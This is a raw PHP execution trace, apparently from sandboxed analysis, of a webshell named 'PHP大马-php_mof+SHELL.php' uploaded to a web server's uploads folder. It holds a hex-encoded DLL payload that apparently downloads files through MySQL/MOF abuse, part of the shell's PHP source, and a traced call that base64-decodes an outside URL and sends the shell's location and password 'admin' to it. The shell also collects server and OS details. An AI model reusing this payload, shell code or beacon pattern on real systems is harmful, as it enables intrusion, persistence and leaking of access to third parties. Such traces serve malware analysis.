0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";\r\n}\r\n \r\n\r\n\r\nclass eanver{\r\nvar $out=\'\';\r\nfunction eanver($dir){\r\n\tif(@function_exists(\'gzcompress\')){\r\n\tif(count($dir) > 0){\r\n\tforeach($dir as $file){\r\n\t\tif(is_file($file)){\r\n\t\t\t$filecode = file_get_contents($file);\r\n\t\t\tif(is_array($dir)) $file = basename($file);\r\n\t\t\t$this -> filezip($filecode,$file);\r\n\t\t}\r\n\t}\r\n\t$this->out = $this -> packfile();\r\n\t}\r\n\treturn true;\r\n\t}\r\n\telse return false;\r\n}\r\n\tvar $datasec = array();\r\n\tvar $ctrl_dir = array();\r\n\tvar $eof_ctrl_dir = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00";\r\n\tvar $old_offset = 0;\r\n\tfunction at($atunix = 0) {\r\n\t\t$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);\r\n\t\tif ($unixarr[\'year\'] < 1980) {\r\n\t\t\t$unixarr[\'year\'] = 1980;\r\n\t\t\t$unixarr[\'mon\'] = 1;\r\n\t\t\t$unixarr[\'mday\'] = 1;\r\n\t\t\t$unixarr[\'hours\'] = 0;\r\n\t\t\t$unixarr[\'minutes\'] = 0;\r\n\t\t\t$unixarr[\'seconds\'] = 0;\r\n\t\t} \r\n\t\treturn (($unixarr[\'year\'] - 1980) << 25) | ($unixarr[\'mon\'] << 21) | ($unixarr[\'mday\'] << 16) |\r\n\t\t\t\t($unixarr[\'hours\'] << 11) | ($unixarr[\'minutes\'] << 5) | ($unixarr[\'seconds\'] >> 1);\r\n\t}\r\n\tfunction filezip($data, $name, $time = 0) {\r\n\t\t$name = str_replace(\'\\\\\', \'/\', $name);\r\n\t\t$dtime = dechex($this->at($time));\r\n\t\t$hexdtime\t= \'\\x\' . $dtime[6] . $dtime[7]\r\n\t\t\t\t\t. \'\\x\' . $dtime[4] . $dtime[5]\r\n\t\t\t\t\t. \'\\x\' . $dtime[2] . $dtime[3]\r\n\t\t\t\t\t. \'\\x\' . $dtime[0] . $dtime[1];\r\n\t\teval(\'$hexdtime = "\' . $hexdtime . \'";\');\r\n\t\t$fr\t= "\\x50\\x4b\\x03\\x04";\r\n\t\t$fr\t.= "\\x14\\x00";\r\n\t\t$fr\t.= "\\x00\\x00";\r\n\t\t$fr\t.= "\\x08\\x00";\r\n\t\t$fr\t.= $hexdtime;\r\n\t\t$unc_len = strlen($data);\r\n\t\t$crc = crc32($data);\r\n\t\t$zdata = gzcompress($data);\r\n\t\t$c_len = strlen($zdata);\r\n\t\t$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\r\n\t\t$fr .= pack(\'V\', $crc);\r\n\t\t$fr .= pack(\'V\', $c_len);\r\n\t\t$fr .= pack(\'V\', $unc_len);\r\n\t\t$fr .= pack(\'v\', strlen($name));\r\n\t\t$fr .= pack(\'v\', 0);\r\n\t\t$fr .= $name;\r\n\t\t$fr .= $zdata;\r\n\t\t$fr .= pack(\'V\', $crc);\r\n\t\t$fr .= pack(\'V\', $c_len);\r\n\t\t$fr .= pack(\'V\', $unc_len);\r\n\t\t$this -> datasec[] = $fr;\r\n\t\t$new_offset = strlen(implode(\'\', $this->datasec));\r\n\t\t$cdrec = "\\x50\\x4b\\x01\\x02";\r\n\t\t$cdrec .= "\\x00\\x00";\r\n\t\t$cdrec .= "\\x14\\x00";\r\n\t\t$cdrec .= "\\x00\\x00";\r\n\t\t$cdrec .= "\\x08\\x00";\r\n\t\t$cdrec .= $hexdtime;\r\n\t\t$cdrec .= pack(\'V\', $crc);\r\n\t\t$cdrec .= pack(\'V\', $c_len);\r\n\t\t$cdrec .= pack(\'V\', $unc_len);\r\n\t\t$cdrec .= pack(\'v\', strlen($name) );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'V\', 32 );\r\n\t\t$cdrec .= pack(\'V\', $this -> old_offset );\r\n\t\t$this -> old_offset = $new_offset;\r\n\t\t$cdrec .= $name;\r\n\t\t$this -> ctrl_dir[] = $cdrec;\r\n\t}\r\n\tfunction packfile(){\r\n\t\t$data = implode(\'\', $this -> datasec);\r\n\t\t$ctrldir = implode(\'\', $this -> ctrl_dir);\r\n\t\treturn $data.$ctrldir.$this -> eof_ctrl_dir.pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'V\', strlen($ctrldir)).pack(\'V\', strlen($data))."\\x00\\x00";\r\n\t}\r\n}\r\n\r\nclass zip\r\n{\r\n\r\n var $total_files = 0;\r\n var $total_folders = 0; \r\n\r\n function Extract ( $zn, $to, $index = Array(-1) )\r\n {\r\n $ok = 0; $zip = @fopen($zn,\'rb\');\r\n if(!$zip) return(-1);\r\n $cdir = $this->ReadCentralDir($zip,$zn);\r\n $pos_entry = $cdir[\'offset\'];\r\n\r\n if(!is_array($index)){ $index = array($index); }\r\n for($i=0; $index[$i];$i++){\r\n \t\tif(intval($index[$i])!=$index[$i]||$index[$i]>$cdir[\'entries\'])\r\n\t\treturn(-1);\r\n }\r\n for ($i=0; $i<$cdir[\'entries\']; $i++)\r\n {\r\n @fseek($zip, $pos_entry);\r\n $header = $this->ReadCentralFileHeaders($zip);\r\n $header[\'index\'] = $i; $pos_entry = ftell($zip);\r\n @rewind($zip); fseek($zip, $header[\'offset\']);\r\n if(in_array("-1",$index)||in_array($i,$index))\r\n \t$stat[$header[\'filename\']]=$this->ExtractFile($header, $to, $zip);\r\n }\r\n fclose($zip);\r\n return $stat;\r\n }\r\n\r\n function ReadFileHeader($zip)\r\n {\r\n $binary_data = fread($zip, 30);\r\n $data = unpack(\'vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len\', $binary_data);\r\n\r\n $header[\'filename\'] = fread($zip, $data[\'filename_len\']);\r\n if ($data[\'extra_len\'] != 0) {\r\n $header[\'extra\'] = fread($zip, $data[\'extra_len\']);\r\n } else { $header[\'extra\'] = \'\'; }\r\n\r\n $header[\'compression\'] = $data[\'compression\'];$header[\'size\'] = $data[\'size\'];\r\n $header[\'compressed_size\'] = $data[\'compressed_size\'];\r\n $header[\'crc\'] = $data[\'crc\']; $header[\'flag\'] = $data[\'flag\'];\r\n $header[\'mdate\'] = $data[\'mdate\'];$header[\'mtime\'] = $data[\'mtime\'];\r\n\r\n if ($header[\'mdate\'] && $header[\'mtime\']){\r\n $hour=($header[\'mtime\']&0xF800)>>11;$minute=($header[\'mtime\']&0x07E0)>>5;\r\n $seconde=($header[\'mtime\']&0x001F)*2;$year=(($header[\'mdate\']&0xFE00)>>9)+1980;\r\n $month=($header[\'mdate\']&0x01E0)>>5;$day=$header[\'mdate\']&0x001F;\r\n $header[\'mtime\'] = mktime($hour, $minute, $seconde, $month, $day, $year);\r\n }else{$header[\'mtime\'] = time();}\r\n\r\n $header[\'stored_filename\'] = $header[\'filename\'];\r\n $header[\'status\'] = "ok";\r\n return $header;\r\n }\r\n\r\n function ReadCentralFileHeaders($zip){\r\n $binary_data = fread($zip, 46);\r\n $header = unpack(\'vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset\', $binary_data);\r\n\r\n if ($header[\'filename_len\'] != 0)\r\n $header[\'filename\'] = fread($zip,$header[\'filename_len\']);\r\n else $header[\'filename\'] = \'\';\r\n\r\n if ($header[\'extra_len\'] != 0)\r\n $header[\'extra\'] = fread($zip, $header[\'extra_len\']);\r\n else $header[\'extra\'] = \'\';\r\n\r\n if ($header[\'comment_len\'] != 0)\r\n $header[\'comment\'] = fread($zip, $header[\'comment_len\']);\r\n else $header[\'comment\'] = \'\';\r\n\r\n if ($header[\'mdate\'] && $header[\'mtime\'])\r\n {\r\n $hour = ($header[\'mtime\'] & 0xF800) >> 11;\r\n $minute = ($header[\'mtime\'] & 0x07E0) >> 5;\r\n $seconde = ($header[\'mtime\'] & 0x001F)*2;\r\n $year = (($header[\'mdate\'] & 0xFE00) >> 9) + 1980;\r\n $month = ($header[\'mdate\'] & 0x01E0) >> 5;\r\n $day = $header[\'mdate\'] & 0x001F;\r\n $header[\'mtime\'] = mktime($hour, $minute, $seconde, $month, $day, $year);\r\n } else {\r\n $header[\'mtime\'] = time();\r\n }\r\n $header[\'stored_filename\'] = $header[\'filename\'];\r\n $header[\'status\'] = \'ok\';\r\n if (substr($header[\'filename\'], -1) == \'/\')\r\n $header[\'external\'] = 0x41FF0010;\r\n return $header;\r\n }\r\n\r\n function ReadCentralDir($zip,$zip_name){\r\n\t$size = filesize($zip_name);\r\n\r\n\tif ($size < 277) $maximum_size = $size;\r\n\telse $maximum_size=277;\r\n\t\r\n\t@fseek($zip, $size-$maximum_size);\r\n\t$pos = ftell($zip); $bytes = 0x00000000;\r\n\t\r\n\twhile ($pos < $size){\r\n\t\t$byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);\r\n\t\tif ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;\r\n\t}\r\n\t\r\n\t$fdata=fread($zip,18);\r\n\t\r\n\t$data=@unpack(\'vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size\',$fdata);\r\n\t\r\n\tif ($data[\'comment_size\'] != 0) $centd[\'comment\'] = fread($zip, $data[\'comment_size\']);\r\n\telse $centd[\'comment\'] = \'\'; $centd[\'entries\'] = $data[\'entries\'];\r\n\t$centd[\'disk_entries\'] = $data[\'disk_entries\'];\r\n\t$centd[\'offset\'] = $data[\'offset\'];$centd[\'disk_start\'] = $data[\'disk_start\'];\r\n\t$centd[\'size\'] = $data[\'size\']; $centd[\'disk\'] = $data[\'disk\'];\r\n\treturn $centd;\r\n }\r\n\r\n function ExtractFile($header,$to,$zip){\r\n\t$header = $this->readfileheader($zip);\r\n\t\r\n\tif(substr($to,-1)!="/") $to.="/";\r\n\tif($to==\'./\') $to = \'\';\t\r\n\t$pth = explode("/",$to.$header[\'filename\']);\r\n\t$mydir = \'\';\r\n\tfor($i=0;$itotal_folders==0)) && is_dir($mydir)) ){\r\n\t\t\t@chmod($mydir,0777);\r\n\t\t\t$this->total_folders ++;\r\n\t\t\techo "Ŀ¼: $mydir
";\r\n\t\t}\r\n\t}\r\n\t\r\n\tif(strrchr($header[\'filename\'],\'/\')==\'/\') return;\t\r\n\r\n\tif (!($header[\'external\']==0x41FF0010)&&!($header[\'external\']==16)){\r\n\t\tif ($header[\'compression\']==0){\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'], \'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$size = $header[\'compressed_size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 2048 ? $size : 2048);\r\n\t\t\t\t$buffer = fread($zip, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\tfclose($fp);\r\n\t\t\ttouch($to.$header[\'filename\'], $header[\'mtime\']);\r\n\t\t}else{\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'].\'.gz\',\'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$binary_data = pack(\'va1a1Va1a1\', 0x8b1f, Chr($header[\'compression\']),\r\n\t\t\tChr(0x00), time(), Chr(0x00), Chr(3));\r\n\t\t\t\r\n\t\t\tfwrite($fp, $binary_data, 10);\r\n\t\t\t$size = $header[\'compressed_size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 1024 ? $size : 1024);\r\n\t\t\t\t$buffer = fread($zip, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\r\n\t\t\t$binary_data = pack(\'VV\', $header[\'crc\'], $header[\'size\']);\r\n\t\t\tfwrite($fp, $binary_data,8); fclose($fp);\r\n\t\r\n\t\t\t$gzp = @gzopen($to.$header[\'filename\'].\'.gz\',\'rb\') or die("Cette archive est compress");\r\n\t\t\tif(!$gzp) return(-2);\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'],\'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$size = $header[\'size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 2048 ? $size : 2048);\r\n\t\t\t\t$buffer = gzread($gzp, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\tfclose($fp); gzclose($gzp);\r\n\t\t\r\n\t\t\ttouch($to.$header[\'filename\'], $header[\'mtime\']);\r\n\t\t\t@unlink($to.$header[\'filename\'].\'.gz\');\r\n\t\t\t\r\n\t\t}\r\n\t}\r\n\t\r\n\t$this->total_files ++;\r\n\techo "ļ: $to$header[filename]
";\r\n\treturn true;\r\n }\r\n}\r\nob_end_flush();' /var/www/html/uploads/PHP大马-php_mof+SHELL.php 8 0 3 10 0 0.015210 1612880 ob_start 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 1 0 3 10 1 0.015248 1629392 3 10 R TRUE 3 11 0 0.015267 1629392 base64_decode 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2 1 'aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09' 3 11 1 0.015288 1629488 3 11 R 'http://45677789.com/?hm=' 3 12 0 0.015306 1629456 base64_decode 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2 1 'aHR0cDovLw==' 3 12 1 0.015323 1629528 3 12 R 'http://' 3 13 0 0.015340 1629552 urlencode 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2 1 'http://localhost/uploads/PHP大马-php_mof+SHELL.php||admin' 3 13 1 0.015359 1629696 3 13 R 'http%3A%2F%2Flocalhost%2Fuploads%2FPHP%E5%A4%A7%E9%A9%AC-php_mof%2BSHELL.php%7C%7Cadmin' 3 14 0 0.015378 1629552 file_get_contents 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2 1 'http://45677789.com/?hm=http%3A%2F%2Flocalhost%2Fuploads%2FPHP%E5%A4%A7%E9%A9%AC-php_mof%2BSHELL.php%7C%7Cadmin&bz=php' 3 14 1 0.693880 1632040 3 14 R FALSE 3 15 0 0.693995 1631840 define 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 3 2 'myaddress' '/var/www/html/uploads/PHP大马-php_mof+SHELL.php' 3 15 1 0.694043 1631944 3 15 R TRUE 3 16 0 0.694056 1631872 define 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 4 2 'myaddress' '/var/www/html/uploads/PHP大马-php_mof+SHELL.php' 3 16 1 0.694073 1631944 3 16 R FALSE 3 17 0 0.694086 1631872 define 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 5 2 'envlpass' 'admin' 3 17 1 0.694101 1631976 3 17 R TRUE 3 18 0 0.694113 1631904 define 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 6 2 'shellname' 'caidaome.com' 3 18 1 0.694128 1632008 3 18 R TRUE 3 19 0 0.694140 1631936 define 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 7 2 'myurl' 'http://www.caidaome.com' 3 19 1 0.694155 1632040 3 19 R TRUE 3 20 0 0.694167 1631968 get_magic_quotes_gpc 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 9 0 3 20 1 0.694182 1631968 3 20 R FALSE 3 21 0 0.694196 1631968 md5 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 16 1 'admin' 3 21 1 0.694211 1632064 3 21 R '21232f297a57a5a743894a0e4a801fc3' 3 22 0 0.694228 1631968 islogin 1 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 28 2 'caidaome.com' 'http://www.caidaome.com' 4 23 0 0.694245 1631968 gethostbyname 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2818 1 'localhost' 4 23 1 0.694292 1632048 4 23 R '127.0.0.1' 3 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2818 $Server_IP = '127.0.0.1' 3 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2819 $Server_OS = 'Linux' 3 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2820 $Server_Soft = 'Apache/2.4.52 (Ubuntu)' 4 24 0 0.694352 1632008 php_uname 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2821 0 4 24 1 0.694367 1632120 4 24 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 3 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2821 $web_server = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 4 25 0 0.694405 1632120 preg_replace 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code 2846 3 '/[_]/e' NULL '__' 4 25 1 0.694455 1632216 4 25 R NULL 3 22 1 0.694470 1631968 0.694533 1535936 TRACE END [2023-02-12 22:47:17.795283]